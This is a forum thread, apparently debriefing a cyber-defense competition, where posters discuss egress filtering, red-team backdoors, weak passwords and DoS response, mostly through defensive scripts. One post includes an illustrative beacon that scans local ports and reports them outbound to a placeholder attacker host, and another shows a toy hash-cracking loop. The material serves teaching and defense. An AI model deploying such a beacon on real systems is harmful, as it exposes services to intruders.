One person per device seemed to work well, but don't dedicate someone solely to injects; that's a waste of a person. Have injects handled by someone who isn't doing much else (for example, whoever runs the Debian email server) and keep an eye on them. Injects are one of the largest point portions of the competition. The way it works: you get assigned a task (install this program, upgrade this service, something like that) and have a time limit to complete it. These are worth pretty big points, and completing one will most likely unlock another inject building on the first.
Interesting scenario. I had no idea...
The red team stated afterward that one of our biggest issues was poor firewall/router rules. These need to be rock solid on both inbound and outbound traffic. One problem we had from this was that the router/firewall was blocking legitimate traffic originating from inside.
In my opinion, the most secure organizations don't let a server fetch its own updates directly from the box. That's bad practice for bastion services that are likely to be attacked. A server should only be able to communicate on the ports it critically needs, and the real-world environments I see where this is the case tend to be the most secure. You should not lose points for that, period (in my opinion). I even recommended previously that egress filtering should be sharply restricted. I advocate change windows, where firewall rules are opened temporarily on a weekly (or less frequent) basis to do updates and then closed again. A web server should be able to make NO outbound connections that were not initiated by an external host. Period. That is best practice.
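To make that concrete, here's a minimal sketch of a default-deny egress policy, assuming a Linux box with iptables; the specific rules are illustrative assumptions, not a drop-in config:

```python
import subprocess

# Illustrative default-deny egress policy for a bastion web server.
RULES = [
    # Drop all outbound traffic by default.
    ["iptables", "-P", "OUTPUT", "DROP"],
    # Allow replies to connections initiated from outside (e.g. HTTP clients).
    ["iptables", "-A", "OUTPUT", "-m", "state",
     "--state", "ESTABLISHED,RELATED", "-j", "ACCEPT"],
    # Allow loopback so local services keep working.
    ["iptables", "-A", "OUTPUT", "-o", "lo", "-j", "ACCEPT"],
    # During a scheduled change window you might temporarily append
    # (and later delete) a rule permitting outbound HTTPS for updates:
    #   iptables -A OUTPUT -p tcp --dport 443 -m state --state NEW -j ACCEPT
]

def apply_rules(rules):
    for rule in rules:
        subprocess.run(rule, check=True)

if __name__ == "__main__":
    apply_rules(RULES)
```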
One thing the red team did (and perhaps SecurityTheatre can elaborate) is that within the first hour or so they installed backdoors that would scan the system for open ports and then send outbound packets telling the red team which ports were in use, so they could connect back to them.
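To make the described behaviour concrete, here is a minimal sketch of that kind of beacon; the collector address and port are hypothetical, and this is a guess at the mechanism, not the red team's actual tool:

```python
import socket

RED_TEAM_HOST = "203.0.113.50"  # hypothetical red-team collector
RED_TEAM_PORT = 9999            # hypothetical collector port

def find_open_ports(host="127.0.0.1", ports=range(1, 1025)):
    """Scan the local machine for listening TCP ports."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.2)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

def beacon(open_ports):
    """Report the open ports over an OUTBOUND connection -- which is
    exactly the traffic that strict egress filtering would have stopped."""
    with socket.create_connection((RED_TEAM_HOST, RED_TEAM_PORT)) as s:
        s.sendall(repr(open_ports).encode())

if __name__ == "__main__":
    beacon(find_open_ports())
```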
It sounds like these are pretty standard reverse-TCP backdoors, but HOW did they install them? Properly configured and hardened services behind a reasonable firewall are NOT trivial to just drop shellcode on. This is a huge gap in the explanation; do you have any more information? This is where the compromise happened. Once a box is compromised, the industry-standard practice is to take the box down completely, back up the data, and restore it from a known clean image. Teaching the "cleaning" of a compromised critical server is a mistake that encourages bad security practices.
They didn't seem too concerned with password hacking/cracking; however, they will compromise weak ones. Do not use easy passwords.
In a real enterprise, passwords and password hashes are a fundamental security issue, possibly THE fundamental security issue. It's fair to point out that in many types of systems one doesn't need to crack the passwords at all, and that having root/admin access to the box itself is enough to compromise many of its neighbours.
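As a toy illustration of why weak passwords fall instantly once hashes are exposed (the hash choice and wordlist here are made up for the example):

```python
import hashlib

# A stolen, unsalted SHA-256 hash of a weak password.
stolen_hash = hashlib.sha256(b"password123").hexdigest()

# Even a tiny wordlist recovers it immediately; real crackers try
# billions of candidates per second against fast hashes like this.
for candidate in ["letmein", "qwerty", "password123", "hunter2"]:
    if hashlib.sha256(candidate.encode()).hexdigest() == stolen_hash:
        print(f"cracked: {candidate}")
        break
```

A slow, salted KDF such as bcrypt or scrypt raises the per-guess cost enormously, which is why fast unsalted hashes are a liability the moment they are dumped.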
Another big issue we had was keeping services up. Out of the seven or so monitored services, we could only ever get a maximum of four up at once, and quite often only one or two were up, if any at all. The web server was "flapping" on and off for the last few hours and I don't know why. They brought down my FTP server about three hours in (after we fought back and forth for a bit), and I never found out what they did or how to bring it back up, as I was too busy with injects.
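In hindsight, even a tiny transition logger would have shown when and how often things flapped. A rough sketch (the service names and ports are assumptions):

```python
import socket
import time

# Assumed local services to watch; substitute the actual scored services.
SERVICES = {"web": ("127.0.0.1", 80), "ftp": ("127.0.0.1", 21)}
state = {}

def is_up(addr):
    try:
        with socket.create_connection(addr, timeout=2):
            return True
    except OSError:
        return False

while True:
    for name, addr in SERVICES.items():
        up = is_up(addr)
        if state.get(name) != up:  # log only transitions, i.e. the flapping
            print(f"{time.strftime('%H:%M:%S')} {name} -> {'UP' if up else 'DOWN'}")
            state[name] = up
    time.sleep(10)
```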
So they were actively running denial-of-service attacks against services? Did you have any sort of IDS/IPS engaged? In a real-world scenario, DoS attacks are often met with blunt force: restricting incoming traffic in bulk. It's often pretty easy to work out where the traffic is coming from by looking at all incoming traffic, splitting the source range in half and blocking one half outright, then narrowing it down until you determine the exact IPs. If they are known attacks, a modern IPS will do this for you; I presume they didn't have some really unique 0-day code for this type of thing.
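That bisection idea is easy to sketch: count traffic per source range, split the range in half, and recurse into the noisy halves until you are down to individual hosts. The packet log here is fabricated for illustration:

```python
import ipaddress
from collections import Counter

def traffic_from(network, packet_log):
    """Total packets whose source address falls inside the given range."""
    return sum(count for ip, count in packet_log.items()
               if ipaddress.ip_address(ip) in network)

def isolate_attackers(network, packet_log, threshold=1000):
    """Recursively bisect a CIDR range, drilling into noisy halves until
    the ranges are narrow enough to block outright."""
    if traffic_from(network, packet_log) < threshold:
        return []                         # quiet range: leave it alone
    if network.prefixlen >= 32:
        return [network]                  # single noisy host: block it
    blocked = []
    for half in network.subnets(prefixlen_diff=1):
        blocked.extend(isolate_attackers(half, packet_log, threshold))
    return blocked

# Fabricated packet counts keyed by source IP.
log = Counter({"203.0.113.7": 50000, "203.0.113.9": 40000, "203.0.113.200": 10})
print(isolate_attackers(ipaddress.ip_network("203.0.113.0/24"), log))
# -> [IPv4Network('203.0.113.7/32'), IPv4Network('203.0.113.9/32')]
```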
The competition scores services for being up, and the red team just tries to bring them down. They don't really try to gain control of the servers per se, but they will plant things that let them easily regain access if you fix the hole they came in through initially.
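Checking for that kind of planted re-entry (extra SSH keys, rogue cron entries) can be scripted; a hedged sketch, diffing against baselines a real team would snapshot before the event (the baselines here are empty placeholders):

```python
import pathlib

# Placeholder baselines; snapshot the real contents at competition start.
KNOWN_SSH_KEYS = set()   # expected lines in authorized_keys
KNOWN_CRON = set()       # expected crontab entries

def report_unexpected(path, baseline, label):
    p = pathlib.Path(path)
    if not p.exists():
        return
    for line in p.read_text().splitlines():
        line = line.strip()
        if line and not line.startswith("#") and line not in baseline:
            print(f"[{label}] unexpected entry: {line}")

report_unexpected("/root/.ssh/authorized_keys", KNOWN_SSH_KEYS, "ssh")
report_unexpected("/etc/crontab", KNOWN_CRON, "cron")
```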
That's a boring test.
The DoS attacks are neat and all, but they are self-limiting, and identifying and combating them is just a matter of sheer manpower. In a real-world environment, DoS attacks are seldom ranked higher than "Medium" on our severity rating scale, with "High" and "Critical" reserved for remote compromise and massive information disclosure.
I'm sure there is a lot more, but those are the main points that I got from it.
Once again, thank you for all your help; I'm sure it kept us from placing 5th.
Meh, it sounds like my advice was targeted toward a different aim than this competition's scoring. Keeping services up at all costs is actually slightly contrary to "real security", if you ask me. From a strategic standpoint, a company needs to be prepared to take a bit of short-term pain and drop their entire link for a few hours if they are under targeted attack, to prevent a much more damaging information disclosure in the long term, especially if there is evidence of a backdoor being installed on any internal services.
Frankly, Sony eventually did the right thing back in the spring when they finally came around to pulling the entire network offline and re-architecting it from scratch in a new data center. Fighting a running battle with attackers to keep services up is just not a viable approach, especially as they gradually worm further into the system and threaten to compromise the identities and financials of millions of people.
Better luck next year, eh?
Congrats on 4th anyway, fwiw.